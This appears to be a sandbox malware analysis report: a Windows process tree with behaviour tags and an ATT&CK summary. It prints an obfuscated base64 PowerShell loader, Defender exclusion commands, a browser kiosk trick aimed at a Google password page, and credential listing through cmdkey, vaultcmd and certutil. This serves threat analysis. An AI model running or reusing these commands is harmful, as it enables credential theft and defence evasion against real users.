C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:1000
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T7⤵
- System Location Discovery: System Language Discovery
PID:4768
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:3776
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:3968
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:4884
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking7⤵PID:5668
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking8⤵
- Drops desktop.ini file(s)
- Checks processor information in registry
- Modifies registry class
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:5144 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2008 -prefsLen 27099 -prefMapHandle 2012 -prefMapSize 270279 -ipcHandle 2088 -initialChannelId {e3d24d73-c7f7-45ba-a576-d8f9c3317c30} -parentPid 5144 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5144" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu9⤵PID:216
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2496 -prefsLen 27135 -prefMapHandle 2500 -prefMapSize 270279 -ipcHandle 2508 -initialChannelId {0f83d1d0-7175-4230-8876-dd31facdb6be} -parentPid 5144 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5144" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket9⤵PID:4592
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3912 -prefsLen 25213 -prefMapHandle 3916 -prefMapSize 270279 -jsInitHandle 3920 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3928 -initialChannelId {4a641b97-5126-4db8-ad85-c45842c455af} -parentPid 5144 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5144" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab9⤵
- Checks processor information in registry
PID:3060
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 4128 -prefsLen 27325 -prefMapHandle 4132 -prefMapSize 270279 -ipcHandle 4216 -initialChannelId {ce04f51f-bda9-4c4a-944f-780be32b1c2a} -parentPid 5144 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5144" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd9⤵PID:4860
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3120 -prefsLen 34824 -prefMapHandle 3208 -prefMapSize 270279 -jsInitHandle 3112 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3184 -initialChannelId {79a513dd-786d-4a5f-a80a-6730bd503363} -parentPid 5144 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5144" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab9⤵
- Checks processor information in registry
PID:232
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 5072 -prefsLen 35012 -prefMapHandle 5076 -prefMapSize 270279 -ipcHandle 5084 -initialChannelId {86f224fd-b16c-43c8-961c-c88df52f1ea5} -parentPid 5144 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5144" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility9⤵
- Checks processor information in registry
PID:6232
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5420 -prefsLen 32952 -prefMapHandle 5424 -prefMapSize 270279 -jsInitHandle 5428 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5432 -initialChannelId {a51d2570-f891-4619-86ff-95f01cd6d2ff} -parentPid 5144 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5144" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab9⤵
- Checks processor information in registry
PID:6548
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5604 -prefsLen 32952 -prefMapHandle 5608 -prefMapSize 270279 -jsInitHandle 5612 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5620 -initialChannelId {4d81eab3-7c5e-4a9c-a14e-da7ffbd484c2} -parentPid 5144 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5144" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab9⤵
- Checks processor information in registry
PID:6560
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5748 -prefsLen 32952 -prefMapHandle 5804 -prefMapSize 270279 -jsInitHandle 5808 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5816 -initialChannelId {68b1a432-72dd-4e4d-bef4-60de30937589} -parentPid 5144 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5144" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab9⤵
- Checks processor information in registry
PID:6572
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10413400101\6089caffb3.exe"C:\Users\Admin\AppData\Local\Temp\10413400101\6089caffb3.exe"6⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender TamperProtection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:2844
-
-
C:\Users\Admin\AppData\Local\Temp\10413410101\YGYZCmt.exe"C:\Users\Admin\AppData\Local\Temp\10413410101\YGYZCmt.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4572 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
- System Location Discovery: System Language Discovery
PID:100
-
-
-
C:\Users\Admin\AppData\Local\Temp\10413420101\Rm3cVPI.exe"C:\Users\Admin\AppData\Local\Temp\10413420101\Rm3cVPI.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4532
-
-
C:\Users\Admin\AppData\Local\Temp\10413430101\p3hx1_003.exe"C:\Users\Admin\AppData\Local\Temp\10413430101\p3hx1_003.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
PID:5948 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'7⤵PID:5576
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-MpPreference -ExclusionPath 'C:'8⤵
- Command and Scripting Interpreter: PowerShell
PID:5736
-
-
-
C:\Windows\system32\svchost.exe"C:\Windows\system32\svchost.exe"7⤵
- Downloads MZ/PE file
- Adds Run key to start application
PID:856 -
C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe"C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""8⤵
- Sets service image path in registry
- Executes dropped EXE
- Suspicious behavior: LoadsDriver
PID:6744 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath C:\9⤵
- Command and Scripting Interpreter: PowerShell
PID:12996
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Remove-MpPreference -ExclusionPath C:\9⤵PID:7628
-
-
-
C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe"C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""8⤵
- Deletes itself
- Executes dropped EXE
PID:6420 -
C:\Users\Admin\AppData\Local\Temp\{5baf6fe9-5fe1-44d2-9bab-99a8355c991c}\5bb078af.exe"C:\Users\Admin\AppData\Local\Temp\{5baf6fe9-5fe1-44d2-9bab-99a8355c991c}\5bb078af.exe" -accepteula -adinsilent -silent -processlevel 2 -postboot9⤵PID:9172
-
C:\Users\Admin\AppData\Local\Temp\{2493c9b9-3112-4cae-ac2e-d7f3c9491c8d}\e6ffa05b.exeC:/Users/Admin/AppData/Local/Temp/{2493c9b9-3112-4cae-ac2e-d7f3c9491c8d}/\e6ffa05b.exe -accepteula -adinsilent -silent -processlevel 2 -postboot10⤵PID:9672
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10413440101\qWR3lUj.exe"C:\Users\Admin\AppData\Local\Temp\10413440101\qWR3lUj.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:6188 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
- System Location Discovery: System Language Discovery
PID:6516
-
-
-
C:\Users\Admin\AppData\Local\Temp\10413450101\TbV75ZR.exe"C:\Users\Admin\AppData\Local\Temp\10413450101\TbV75ZR.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2528 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- System Location Discovery: System Language Discovery
PID:3500 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3500 -s 5048⤵
- Program crash
PID:7404
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10413461121\5ym0ZYg.cmd"6⤵
- System Location Discovery: System Language Discovery
PID:7504 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10413461121\5ym0ZYg.cmd"7⤵
- System Location Discovery: System Language Discovery
PID:7552 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiR2bWVhcnAgPSBAJw0KJHVzZXJ4Z3dOYW1lIHhndz0gJGVueGd3djpVU0V4Z3dSTkFNRXhndzskdGlzeGd3ID0gIkN4Z3c6XFVzZXhnd3JzXCR1eGd3c2VyTmF4Z3dtZVxkd3hnd20uYmF0eGd3IjtpZiB4Z3coVGVzdHhndy1QYXRoeGd3ICR0aXN4Z3cpIHsgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiQnhnd2F0Y2ggeGd3ZmlsZSB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dDeWFuO3hndyAgICAkeGd3ZmlsZUx4Z3dpbmVzIHhndz0gW1N5eGd3c3RlbS54Z3dJTy5GaXhnd2xlXTo6eGd3UmVhZEF4Z3dsbExpbnhnd2VzKCR0eGd3aXMsIFt4Z3dTeXN0ZXhnd20uVGV4eGd3dC5FbmN4Z3dvZGluZ3hnd106OlVUeGd3RjgpOyB4Z3cgICBmb3hnd3JlYWNoeGd3ICgkbGl4Z3duZSBpbnhndyAkZmlseGd3ZUxpbmV4Z3dzKSB7IHhndyAgICAgeGd3ICBpZiB4Z3coJGxpbnhnd2UgLW1heGd3dGNoICd4Z3deOjo6IHhndz8oLispeGd3JCcpIHt4Z3cgICAgIHhndyAgICAgeGd3ICBXcml4Z3d0ZS1Ib3hnd3N0ICJJeGd3bmplY3R4Z3dpb24gY3hnd29kZSBkeGd3ZXRlY3R4Z3dlZCBpbnhndyB0aGUgeGd3YmF0Y2h4Z3cgZmlsZXhndy4iIC1GeGd3b3JlZ3J4Z3dvdW5kQ3hnd29sb3IgeGd3Q3lhbjt4Z3cgICAgIHhndyAgICAgeGd3ICB0cnl4Z3cgeyAgIHhndyAgICAgeGd3ICAgICB4Z3cgICAkZHhnd2Vjb2RleGd3ZEJ5dGV4Z3dzID0gW3hnd1N5c3RleGd3bS5Db254Z3d2ZXJ0XXhndzo6RnJveGd3bUJhc2V4Z3c2NFN0cnhnd2luZygkeGd3bWF0Y2h4Z3dlc1sxXXhndy5UcmlteGd3KCkpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3ckaW5qZXhnd2N0aW9ueGd3Q29kZSB4Z3c9IFtTeXhnd3N0ZW0ueGd3VGV4dC54Z3dFbmNvZHhnd2luZ106eGd3OlVuaWN4Z3dvZGUuR3hnd2V0U3RyeGd3aW5nKCR4Z3dkZWNvZHhnd2VkQnl0eGd3ZXMpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3dXcml0ZXhndy1Ib3N0eGd3ICJJbmp4Z3dlY3Rpb3hnd24gY29keGd3ZSBkZWN4Z3dvZGVkIHhnd3N1Y2NleGd3c3NmdWx4Z3dseS4iIHhndy1Gb3JleGd3Z3JvdW54Z3dkQ29sb3hnd3IgR3JleGd3ZW47ICB4Z3cgICAgIHhndyAgICAgeGd3ICAgIFd4Z3dyaXRlLXhnd0hvc3QgeGd3IkV4ZWN4Z3d1dGluZ3hndyBpbmpleGd3Y3Rpb254Z3cgY29kZXhndy4uLiIgeGd3LUZvcmV4Z3dncm91bnhnd2RDb2xveGd3ciBZZWx4Z3dsb3c7IHhndyAgICAgeGd3ICAgICB4Z3cgICAgIHhnd0ludm9reGd3ZS1FeHB4Z3dyZXNzaXhnd29uICRpeGd3bmplY3R4Z3dpb25Db3hnd2RlOyAgeGd3ICAgICB4Z3cgICAgIHhndyAgICBieGd3cmVhazt4Z3cgICAgIHhndyAgICAgeGd3ICB9IGN4Z3dhdGNoIHhnd3sgICAgeGd3ICAgICB4Z3cgICAgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiRXhnd3Jyb3IgeGd3ZHVyaW54Z3dnIGRlY3hnd29kaW5neGd3IG9yIGV4Z3d4ZWN1dHhnd2luZyBpeGd3bmplY3R4Z3dpb24gY3hnd29kZTogeGd3JF8iIC14Z3dGb3JlZ3hnd3JvdW5keGd3Q29sb3J4Z3cgUmVkO3hndyAgICAgeGd3ICAgICB4Z3cgIH07IHhndyAgICAgeGd3ICB9OyB4Z3cgICB9O3hnd30gZWxzeGd3ZSB7ICB4Z3cgICAgV3hnd3JpdGUteGd3SG9zdCB4Z3ciU3lzdHhnd2VtIEVyeGd3cm9yOiB4Z3dCYXRjaHhndyBmaWxleGd3IG5vdCB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dSZWQ7IHhndyAgIGV4eGd3aXQ7fTt4Z3dmdW5jdHhnd2lvbiBweGd3c29nbCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGF4Z3dlc192YXhnd3I9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQWVzeGd3XTo6Q3J4Z3dlYXRlKHhndyk7CSRheGd3ZXNfdmF4Z3dyLk1vZHhnd2U9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQ2lweGd3aGVyTW94Z3dkZV06Onhnd0NCQzsJeGd3JGFlc194Z3d2YXIuUHhnd2FkZGlueGd3Zz1bU3l4Z3dzdGVtLnhnd1NlY3VyeGd3aXR5LkN4Z3dyeXB0b3hnd2dyYXBoeGd3eS5QYWR4Z3dkaW5nTXhnd29kZV06eGd3OlBLQ1N4Z3c3OwkkYXhnd2VzX3ZheGd3ci5LZXl4Z3c9W1N5c3hnd3RlbS5DeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygnVUNEeGd3ZFZ6U3Z4Z3dDMUNvOXhnd1VWb1B1eGd3RXRvVWR4Z3duNzZsQ3hndytPV0tJeGd3OG5qRGV4Z3dxTDZ4MHhndz0nKTsJeGd3JGFlc194Z3d2YXIuSXhnd1Y9W1N5eGd3c3RlbS54Z3dDb252ZXhnd3J0XTo6eGd3RnJvbUJ4Z3dhc2U2NHhnd1N0cmlueGd3ZygnK2F4Z3cvRHp3NHhnd1ZRR1g3eGd3L1J0Y0h4Z3dQQkpWd3hndz09Jyk7eGd3CSRkZWN4Z3dyeXB0b3hnd3JfdmFyeGd3PSRhZXN4Z3dfdmFyLnhnd0NyZWF0eGd3ZURlY3J4Z3d5cHRvcnhndygpOwkkeGd3cmV0dXJ4Z3duX3Zhcnhndz0kZGVjeGd3cnlwdG94Z3dyX3Zhcnhndy5UcmFueGd3c2Zvcm14Z3dGaW5hbHhnd0Jsb2NreGd3KCRwYXJ4Z3dhbV92YXhnd3IsIDAseGd3ICRwYXJ4Z3dhbV92YXhnd3IuTGVueGd3Z3RoKTt4Z3cJJGRlY3hnd3J5cHRveGd3cl92YXJ4Z3cuRGlzcHhnd29zZSgpeGd3OwkkYWV4Z3dzX3Zhcnhndy5EaXNweGd3b3NlKCl4Z3c7CSRyZXhnd3R1cm5feGd3dmFyO314Z3dmdW5jdHhnd2lvbiBzeGd3dGF4cCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGh4Z3dwaGM9Tnhnd2V3LU9ieGd3amVjdCB4Z3dTeXN0ZXhnd20uSU8ueGd3TWVtb3J4Z3d5U3RyZXhnd2FtKCwkeGd3cGFyYW14Z3dfdmFyKXhndzsJJGlzeGd3d2hiPU54Z3dldy1PYnhnd2plY3QgeGd3U3lzdGV4Z3dtLklPLnhnd01lbW9yeGd3eVN0cmV4Z3dhbTsJJHhnd2Zsc2l6eGd3PU5ldy14Z3dPYmplY3hnd3QgU3lzeGd3dGVtLkl4Z3dPLkNvbXhnd3ByZXNzeGd3aW9uLkd4Z3daaXBTdHhnd3JlYW0oeGd3JGhwaGN4Z3csIFtJT3hndy5Db21weGd3cmVzc2l4Z3dvbi5Db3hnd21wcmVzeGd3c2lvbk14Z3dvZGVdOnhndzpEZWNveGd3bXByZXN4Z3dzKTsJJHhnd2Zsc2l6eGd3LkNvcHl4Z3dUbygkaXhnd3N3aGIpeGd3OwkkZmx4Z3dzaXouRHhnd2lzcG9zeGd3ZSgpOwl4Z3ckaHBoY3hndy5EaXNweGd3b3NlKCl4Z3c7CSRpc3hnd3doYi5EeGd3aXNwb3N4Z3dlKCk7CXhndyRpc3doeGd3Yi5Ub0F4Z3dycmF5KHhndyk7fWZ1eGd3bmN0aW94Z3duIGhlenhnd2d4KCRweGd3YXJhbV94Z3d2YXIsJHhnd3BhcmFteGd3Ml92YXJ4Z3cpewkkbnhnd3g9W1N5eGd3c3RlbS54Z3dSZWZsZXhnd2N0aW9ueGd3LkFzc2V4Z3dtYmx5XXhndzo6KCdkeGd3YW9MJ1t4Z3ctMS4uLXhndzRdIC1qeGd3b2luICd4Z3cnKShbYnhnd3l0ZVtdeGd3XSRwYXJ4Z3dhbV92YXhnd3IpOwkkeGd3bGF6PSR4Z3dueC5Fbnhnd3RyeVBveGd3aW50Owl4Z3ckbGF6Lnhnd0ludm9reGd3ZSgkbnV4Z3dsbCwgJHhnd3BhcmFteGd3Ml92YXJ4Z3cpO30kaHhnd29zdC5VeGd3SS5SYXd4Z3dVSS5XaXhnd25kb3dUeGd3aXRsZSB4Z3c9ICR0aXhnd3M7JGxveGd3Zj1bU3l4Z3dzdGVtLnhnd0lPLkZpeGd3bGVdOjp4Z3coJ3R4ZXhnd1RsbEFkeGd3YWVSJ1t4Z3ctMS4uLXhndzExXSAteGd3am9pbiB4Z3cnJykoJHhnd3RpcykueGd3U3BsaXR4Z3coW0Vudnhnd2lyb25teGd3ZW50XTp4Z3c6TmV3THhnd2luZSk7eGd3Zm9yZWF4Z3djaCAoJHhnd3pwamxweGd3IGluICR4Z3dsb2YpIHhnd3sJaWYgeGd3KCR6cGp4Z3dscC5TdHhnd2FydHNXeGd3aXRoKCd4Z3c6OiAnKXhndykJewkJeGd3JGdxYnN4Z3c9JHpwanhnd2xwLlN1eGd3YnN0cml4Z3duZygzKXhndzsJCWJyeGd3ZWFrOwl4Z3d9fSRpdXhnd3A9W3N0eGd3cmluZ1t4Z3ddXSRncXhnd2JzLlNweGd3bGl0KCd4Z3dcJyk7JHhnd25sdD1zeGd3dGF4cCB4Z3cocHNvZ3hnd2wgKFtDeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygkaXVweGd3WzBdKSl4Z3cpOyRqZXhnd2J0PXN0eGd3YXhwICh4Z3dwc29nbHhndyAoW0NveGd3bnZlcnR4Z3ddOjpGcnhnd29tQmFzeGd3ZTY0U3R4Z3dyaW5nKHhndyRpdXBbeGd3MV0pKSl4Z3c7aGV6Z3hnd3ggJG5seGd3dCAkbnV4Z3dsbDtoZXhnd3pneCAkeGd3amVidCB4Z3coLFtzdHhnd3JpbmdbeGd3XV0gKCd4Z3clKicpKXhndzsNCidADQoNCiRybGpmcnAgPSAkdm1lYXJwIC1yZXBsYWNlICd4Z3cnLCAnJw0KDQpJbnZva2UtRXhwcmVzc2lvbiAkcmxqZnJwDQo=')) | Invoke-Expression"8⤵
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- System Location Discovery: System Language Discovery
PID:7608 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\'9⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
PID:8436
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10413470101\81bb507991.exe"C:\Users\Admin\AppData\Local\Temp\10413470101\81bb507991.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:10508
-
-
C:\Users\Admin\AppData\Local\Temp\10413480101\PQPYAYJJ.exe"C:\Users\Admin\AppData\Local\Temp\10413480101\PQPYAYJJ.exe"6⤵PID:8300
-
C:\Users\Admin\Abspawnhlp.exe"C:\Users\Admin\Abspawnhlp.exe"7⤵PID:8560
-
C:\Users\Admin\AppData\Local\NotepadComGKR\Abspawnhlp.exeC:\Users\Admin\AppData\Local\NotepadComGKR\Abspawnhlp.exe8⤵PID:8700
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10413490101\captcha.exe"C:\Users\Admin\AppData\Local\Temp\10413490101\captcha.exe"6⤵PID:9116
-
C:\Windows\system32\cmd.exe"cmd.exe" /c "dxdiag /t > \"C:\Users\Admin\AppData\Local\Temp\dxdiag_temp_3864585960.txt\""7⤵PID:9068
-
-
C:\Windows\system32\net.exe"net" statistics workstation7⤵PID:9696
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 statistics workstation8⤵PID:9752
-
-
-
C:\Windows\system32\vaultcmd.exe"vaultcmd" /list7⤵PID:9948
-
-
C:\Windows\system32\cmdkey.exe"cmdkey" /list7⤵PID:11492
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command " $entries = cmdkey /list | Select-String \"TERMSRV\" -Context 0,3 foreach ($entry in $entries) { $target = ($entry -split \"target=\")[1].Trim() $ip = $target -replace \"TERMSRV/\", \"\" $userLine = $entry.Context.PostContext | Select-String \"User\" $user = if ($userLine) { ($userLine -split \":\")[1].Trim() } else { \"N/A\" } Write-Output \"Server: $ip | Username: $user\" } "7⤵
- Command and Scripting Interpreter: PowerShell
PID:9636 -
C:\Windows\system32\cmdkey.exe"C:\Windows\system32\cmdkey.exe" /list8⤵PID:10392
-
-
-
C:\Windows\system32\tasklist.exe"tasklist"7⤵
- Enumerates processes with tasklist
PID:10072
-
-
C:\Windows\system32\tasklist.exe"tasklist" /FO CSV /NH7⤵
- Enumerates processes with tasklist
PID:10172
-
-
C:\Windows\system32\tasklist.exe"tasklist"7⤵
- Enumerates processes with tasklist
PID:10184
-
-
C:\Windows\system32\tasklist.exe"tasklist"7⤵
- Enumerates processes with tasklist
PID:10412
-
-
C:\Windows\system32\certutil.exe"certutil" -store My7⤵PID:10584
-
-
C:\Windows\system32\tasklist.exe"tasklist"7⤵
- Enumerates processes with tasklist
PID:10568
-
-
-
C:\Users\Admin\AppData\Local\Temp\10413500101\7IIl2eE.exe"C:\Users\Admin\AppData\Local\Temp\10413500101\7IIl2eE.exe"6⤵PID:10288
-
C:\Windows\SysWOW64\CMD.exe"C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat7⤵PID:10468
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exeC:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:2944
-
C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"1⤵PID:1556
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵PID:6096
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"1⤵PID:4624
-
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exeC:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:3980
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}1⤵PID:4400
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}1⤵PID:4712
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 3500 -ip 35001⤵PID:7368
-
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exeC:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:8060
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\{6933409c-556c-44b7-9ee7-3107cb88c22e}\ab0586cb-62cb-46a3-b62a-7725723fe744.cmd"1!1⤵PID:5700
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1System Services
2Service Execution
2Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Create or Modify System Process
8Windows Service
8Event Triggered Execution
1Netsh Helper DLL
1Modify Authentication Process
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Create or Modify System Process
8Windows Service
8Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
File and Directory Permissions Modification
1Hide Artifacts
1Ignore Process Interrupts
1Impair Defenses
7Disable or Modify System Firewall
1Disable or Modify Tools
5Modify Authentication Process
1Modify Registry
8Virtualization/Sandbox Evasion
2Credential Access
Credentials from Password Stores
2Credentials from Web Browsers
1Windows Credential Manager
1Modify Authentication Process
